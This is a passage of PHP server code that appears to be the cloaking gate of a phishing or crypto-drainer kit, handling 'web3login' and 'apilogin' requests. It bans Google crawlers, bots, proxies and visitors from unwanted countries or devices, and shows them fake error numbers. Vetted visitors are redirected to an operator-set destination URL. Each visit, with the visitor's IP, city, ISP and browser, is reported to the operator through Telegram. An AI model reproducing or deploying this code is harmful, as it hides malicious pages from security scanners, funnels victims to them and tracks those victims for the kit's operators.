                    $sip_name = $client_info['isp'];
                    $city = $client_info['city'];
                    $mobile = $client_info['mobile'];
                    $browser = $client_info['Browser'];
                    $log_date = $client_info['local_time'];
                    $response = [
                        'success' => true,
                        'message' => 'Check successful',
                        'data' => [
                            'show_captcha' => true,
							'publickey' => $keydomain['publickey'] ?? '',
                            'pro_logo' => $project_logo ?? '',
                            'pro_msg' => 'Please complete the verification',
                            'name' => $web3_data_project,
                            'passed' => true,
                        ],
                    ];
                } else {
                    $res = banned_client($ipAddress, 'web3 invalid user', $client_info);
                    $response = [
                        'success' => true,
                        'message' => 'An error occurred. Try again. Error number:3903000',
						'data' => [
                        'show_captcha' => false,
						],

                    ];
                }
            } else {
                $res = banned_client($ipAddress, 'web3 not found parm', $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:6631000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
            }
            break;

        case 'web3login':
            // Verify CAPTCHA token
            $captchaToken = $requestData['cf-turnstile-response'] ?? '';
            if (empty($captchaToken)) {
                $response = [
                    'success' => false,
                    'message' => 'CAPTCHA verification required',
                    'data' => [
                        'show_captcha' => true,
                    ],
                ];
                break;
            }

            // Verify CAPTCHA with Cloudflare Turnstile
            $captchaVerification = verifyCloudflareTurnstile($captchaToken, $ipAddress, $keydomain['privatekey']);

            if (!$captchaVerification['success']) {
                $errorMessage = $captchaVerification['error'] ?? 'Verification failed';

                $response = [
                    'success' => false,
                    'message' => 'CAPTCHA verification failed. Please try again.',
                    'data' => [
                        'show_captcha' => true,
                        'error' => $errorMessage,
                    ],
                ];
                break;
            }

            if (detect_user($ipAddress)) {
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5498000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if ($found_key !== false) {
                $res = banned_client($ipAddress, "Detected word: $found_key_name", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5177000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if ($detector !== false) {
                $res = banned_client($ipAddress, "Google Detected", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:4298000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if (is_bot_ip($ipAddress)) {
                $res = banned_client($ipAddress, "Google IP", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:1387000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if ($newData['bot'] === true) {
                $res = banned_client($ipAddress, $newData['reason'], $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:8349000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }

            // Handle Web3 verification completion
            $success_url = url_web3();
            if ($success_url['status'] === 'success') {
                $success_url_final = $success_url['url'];
                $web3_data = user_web3($ipAddress, $web3_id);

                if ($web3_data['status'] === 'success') {
                    $web3_data_project = $web3_data['data']['project_name'];
                    $username = $web3_data['data']['create_by'];
                    $project_logo = $web3_data['data']['pro_logo'];
                    $country = $client_info['country'];
                    $sip_name = $client_info['isp'];
                    $city = $client_info['city'];
                    $mobile = $client_info['mobile'];
                    $browser = $client_info['Browser'];
                    $log_date = $client_info['local_time'];
                    $message = "
✅ 🅽🅴🆆 🆅🅸🆂🅸🆃🅴   (Web3)
--------------------------------------------
🏠  𝗣𝗿𝗼𝗷𝗲𝗰𝘁: {$web3_data_project}
👨‍🔧  𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲: {$username}
📡  𝗜𝗣: {$ipAddress}
🌍  𝗖𝗼𝘂𝗻𝘁𝗿𝘆: {$country}
🗺️  𝗦𝗜𝗣: {$sip_name}
💻  𝗖𝗶𝘁𝘆: {$city}
📱  𝗠𝗼𝗯𝗶𝗹𝗲: {$mobile} 
🌐  𝗕𝗿𝗼𝘄𝘀𝗲𝗿: {$browser} 
🎫  𝗗𝗮𝘁𝗲/𝘁𝗶𝗺𝗲: {$log_date}
--------------------------------------------";

                    $response = [
                        'success' => true,
                        'message' => 'Login successful',
                        'data' => [
                            'redirect_url' => "$success_url_final??userid=$web3_id_normal" ?? '',
                            'user_id' => $web3_id,
                            'pro_logo' => $web3_data['data']['pro_logo'] ?? '',
                            'name' => $web3_data['data']['project_name'] ?? '',
                        ],
                    ];
                    log_visite($ipAddress, 1, $client_info['country'], $client_info['isp'], $web3_data['data']['project_name'], $web3_data['data']['create_by']);
                    send_message($message, $web3_data['data']['tel_token'], $web3_data['data']['tel_id']);
                } else {
                    $res = banned_client($ipAddress, 'invalid web3 user', $client_info);
                    $response = [
                        'status' => 'error',
                        'message' => 'An error occurred. Try again. Error number:2438000',
						'data' => [
                        'show_captcha' => false,
						],

                    ];
                }
            } else {
                $response = [
                    'status' => 'error',
                    'message' => 'An error occurred. Try again. Error number:5638000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
            }

            break;

        case 'blocked':
            $res = banned_client($ipAddress, "client missing", $client_info);
            $response = [
                'success' => true,
                'message' => 'An error occurred. Try again. Error number:6871000',
				'data' => [
                        'show_captcha' => false,
						],
            ];
            break;

        case 'apicheck':
            if ($api_id) {
				
                $userData = redirction_data($api_id, $client_info, $ipAddress);
            if (detect_user($ipAddress)) {
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:3439000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if ($found_key !== false) {
                $res = banned_client($ipAddress, "Detected word: $found_key_name", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:3092000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if ($detector !== false) {
                $res = banned_client($ipAddress, "Google Detected", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:8377000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if (is_bot_ip($ipAddress)) {
                $res = banned_client($ipAddress, "Google IP", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:1099000',
                ];
                break;
            }
            if ($userData['allow_proxy'] == 1) {
                if ($client_info['proxy'] == 'True') {
                    $res = banned_client($ipAddress, "Proxy Detected", $client_info);
                    $response = [
                        'success' => true,
                        'message' => 'An error occurred. Try again. Error number:7932000',
						'data' => [
                        'show_captcha' => false,
						],
                    ];

                    break;
                }
            }
            if ($newData['bot'] === true) {
                $res = banned_client($ipAddress, $newData['reason'], $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:8319000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
              
                break;
            }
			if ($userData['allow_mobile'] == 1 && $deviceType !== "mobile") {
                     $res = banned_client($ipAddress, "not allow device", $client_info);
                     $response = [
                         'success' => true,
                         'message' => "An error occurred. Try again. Error number:4592000",
                         'data' => [
                             'show_captcha' => false,
                             'pro_logo' => 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',
                             'passed' => false,
                         ],
                     ];
					  break; 
                 }
            if (!check_country_smart($userData['allow_country'], $client_info['countryCode'])) {
                $res = banned_client($ipAddress, 'Invalid country', $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:4328000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
                
                if ($userData['status']) {
                 
                    $response = [
                        'success' => true,
                        'message' => 'API successful',
                        'data' => [
                            'show_captcha' => true,
							'publickey' => $keydomain['publickey'] ?? '',
                            'pro_logo' => $userData['logo_url'] ?? 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',
                            'name' => $userData['source_name'],
                            'passed' => true,
                        ],
                    ];
                  
                } else {
                    $res = banned_client($ipAddress, "Smart not Found $api_id", $client_info);
                    $response = [
                        'success' => true,
                        'message' => "An error occurred. Try again. Error number:590433",
                        'data' => [
                            'show_captcha' => false,
                            'pro_logo' => 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',
                        ],
                    ];
                }
            } else {
                $res = banned_client($ipAddress, 'smart inccorect', $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:3920000',
                    'data' => [
                        'show_captcha' => false,
                        'pro_logo' => 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',
                    ],
                ];
            }
            break;
        case 'apilogin':
		
            // Verify CAPTCHA token
            $captchaToken = $requestData['cf-turnstile-response'] ?? '';
            if (empty($captchaToken)) {
                $response = [
                    'success' => false,
                    'message' => 'CAPTCHA verification required',
                    'data' => [
                        'show_captcha' => true,
                    ],
                ];
                break;
            }

            // Verify CAPTCHA with Cloudflare Turnstile
            $captchaVerification = verifyCloudflareTurnstile($captchaToken, $ipAddress, $keydomain['privatekey']);

            if (!$captchaVerification['success']) {
                $errorMessage = $captchaVerification['error'] ?? 'Verification failed';

                $response = [
                    'success' => false,
                    'message' => 'CAPTCHA verification failed. Please try again.',
                    'data' => [
                        'show_captcha' => true,
                        'error' => $errorMessage,
                    ],
                ];
                break;
            }

            if ($api_id) {
			
                $userData = redirction_data($api_id, $client_info, $ipAddress);
				$update_data = increment_click($api_id, $ipAddress, $client_info['user_agent'] ?? '');
            if (detect_user($ipAddress)) {
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:3439000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if ($found_key !== false) {
                $res = banned_client($ipAddress, "Detected word: $found_key_name", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:3092000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if ($detector !== false) {
                $res = banned_client($ipAddress, "Google Detected", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:8377000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if (is_bot_ip($ipAddress)) {
                $res = banned_client($ipAddress, "Google IP", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:1099000',
                ];
                break;
            }
            if ($userData['allow_proxy'] == 1) {
                if ($client_info['proxy'] == 'True') {
                    $res = banned_client($ipAddress, "Proxy Detected", $client_info);
                    $response = [
                        'success' => true,
                        'message' => 'An error occurred. Try again. Error number:7932000',
						'data' => [
                        'show_captcha' => false,
						],
                    ];

                    break;
                }
            }
            if ($newData['bot'] === true) {
                $res = banned_client($ipAddress, $newData['reason'], $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:8319000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
              
                break;
            }
			if ($userData['allow_mobile'] == 1 && $deviceType !== "mobile") {
                     $res = banned_client($ipAddress, "not allow device", $client_info);
                     $response = [
                         'success' => true,
                         'message' => "An error occurred. Try again. Error number:4592000",
                         'data' => [
                             'show_captcha' => false,
                             'pro_logo' => 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',
                             'passed' => false,
                         ],
                     ];
					  break; 
                 }
            if (!check_country_smart($userData['allow_country'], $client_info['countryCode'])) {
                $res = banned_client($ipAddress, 'Invalid country', $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:4328000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
                
				
                if ($userData['status']) {

					$username = $userData['admin_name']; 
					$api_token = $userData['token']; 
					$api_chatid = $userData['chatid']; 
                    $country = $client_info['country'];
                    $sip_name = $client_info['isp'];
                    $city = $client_info['city'];
                    $mobile = $client_info['mobile'];
                    $browser = $client_info['Browser'];
                    $log_date = $client_info['local_time'];
                    $message = "
✅ 🅽🅴🆆 🆅🅸🆂🅸🆃🅴   (SMART URL)
--------------------------------------------
🏠  𝗣𝗿𝗼𝗷𝗲𝗰𝘁: {$api_id}
👨‍🔧  𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲: {$username}
📡  𝗜𝗣: {$ipAddress}
🌍  𝗖𝗼𝘂𝗻𝘁𝗿𝘆: {$country}
🗺️  𝗦𝗜𝗣: {$sip_name}
💻  𝗖𝗶𝘁𝘆: {$city}
📱  𝗠𝗼𝗯𝗶𝗹𝗲: {$mobile} 
🌐  𝗕𝗿𝗼𝘄𝘀𝗲𝗿: {$browser} 
🎫  𝗗𝗮𝘁𝗲/𝘁𝗶𝗺𝗲: {$log_date}
--------------------------------------------";
                      log_visite($ipAddress, 2, $client_info['country'], $client_info['isp'], $api_id, $username);
                      send_message($message, $api_token, $api_chatid);
					  $response = [
                        'success' => true,
                        'message' => 'Api Login successful',
                        'data' => [
						    'publickey' => $keydomain['publickey'] ?? '',
                            'redirect_url' => $userData['destination_url'] ?? '',
                            'user_id' => $api_id,
                        ],
                    ];
                  
                } else {
                    $res = banned_client($ipAddress, "Smart not Found $api_id", $client_info);
                    $response = [
                        'success' => true,
                        'message' => "An error occurred. Try again. Error number:7190000",
                        'data' => [
                            'show_captcha' => false,
                            'pro_logo' => 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',
                            'passed' => false,
                            'isbanned' => true,
                        ],
                    ];
                }
            } else {
                $res = banned_client($ipAddress, 'smart inccorect', $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:3920000',  
                    'data' => [
                        'show_captcha' => false,
                        'pro_logo' => 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',
                        'passed' => false,
                        'isbanned' => true,
                    ],
                ];
            }
            break;		
		
        default:
		     $res = banned_client($ipAddress, 'Invalid request type', $client_info);
             $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:8241000',  
                    'data' => [
                        'show_captcha' => false,
                        'pro_logo' => 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',
                        'passed' => false,
                        'isbanned' => true,
                    ],
                ];
           
    }
} catch (Exception $e) {
    $response = [
        'success' => false,
        'message' => 'Server error: ' . $e->getMessage(),
        'data' => [],
    ];
    http_response_code(500);
}

// Return JSON response
//echo json_encode($response);
echo json_encode($response, JSON_UNESCAPED_UNICODE);
exit();

?>
